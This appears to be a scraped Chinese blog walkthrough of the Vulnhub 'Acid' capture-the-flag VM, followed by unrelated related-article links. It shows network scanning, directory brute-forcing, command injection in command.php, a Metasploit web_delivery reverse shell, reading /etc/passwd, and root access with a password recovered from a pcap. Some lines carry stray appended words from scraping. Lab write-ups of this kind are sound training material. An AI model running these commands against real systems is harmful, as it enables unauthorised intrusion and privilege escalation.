Vulnhub Acid
一、信息收集
1.一、netdiscover
netdiscover -i eth0 -r 192.168.118.0/24php
1.二、 Nmap
nmap -sP -T4 192.168.118.0/24html
nmap -sS -T4 -sV -O -p- 192.168.118.146python
1.3 33447
view-source:http://192.168.118.146:33447/web
643239334c6d70775a773d3d ==》 wow.jpgshell
1.4 wow.jpg
notepad++ 打开 bash
3761656530663664353838656439393035656533376631366137633631306434tcp
==》spa
7aee0f6d588ed9905ee37f16a7c610d43d
7aee0f6d588ed9905ee37f16a7c610d4htm
MD5 解密==》63425 (后面发现并没什么卵用)
1.5 dirbuster爆破
标题俩个路径:
http://192.168.118.146:33447/Challenge/
http://192.168.118.146:33447/Challenge/cake.php
==>
/Magic_Box
再次爆破目录:
http://192.168.118.146:33447/Challenge/Magic_Box/command.php
二、漏洞挖掘
命令注入:
http://192.168.118.146:33447/Challenge/Magic_Box/command.php
三、 反弹shell
3.一、请移步:web_delivery
use exploit/multi/script/web_delivery
su: must be run from a terminal
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
四、权限提高
cat /etc/passwd,发现须要关注的用户有:acid,saman,root
find / -user acid 2>/dev/null
发一个hint.pcapng
打开后跟踪tcp流
发现saman的密码:1337hax0r
su提权到saman、root,得到flag
再使用sudo -i 提权到root,密码一样是1337hax0r,得到位于root目录的flag.txt
notepad:
一、查找acid用户的文件
find / -user acid 2>/dev/null
二、使用metasploit反弹shell
exploit/multi/script/web_delivery
- 1. 【Vulnhub】Acid
- 2. 【Vulnhub】Acid-Reloaded
- 3. Vulnhub靶场渗透练习(四) Acid
- 4. ACID
- 5. Vulnhub靶场第四关
- 6. vulnhub-dc8
- 7. vulnhub chakravyuh
- 8. vulnhub View2akill
- 9. Vulnhub Billu_b0x
- 10. VulnHub Raven
- 更多相关文章...
- • ACID原则是什么? - NoSQL教程
- • NewSQL数据库是什么? - NoSQL教程
- • 再有人问你分布式事务,把这篇扔给他
- • 常用的分布式事务解决方案
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 【Vulnhub】Acid
- 2. 【Vulnhub】Acid-Reloaded
- 3. Vulnhub靶场渗透练习(四) Acid
- 4. ACID
- 5. Vulnhub靶场第四关
- 6. vulnhub-dc8
- 7. vulnhub chakravyuh
- 8. vulnhub View2akill
- 9. Vulnhub Billu_b0x
- 10. VulnHub Raven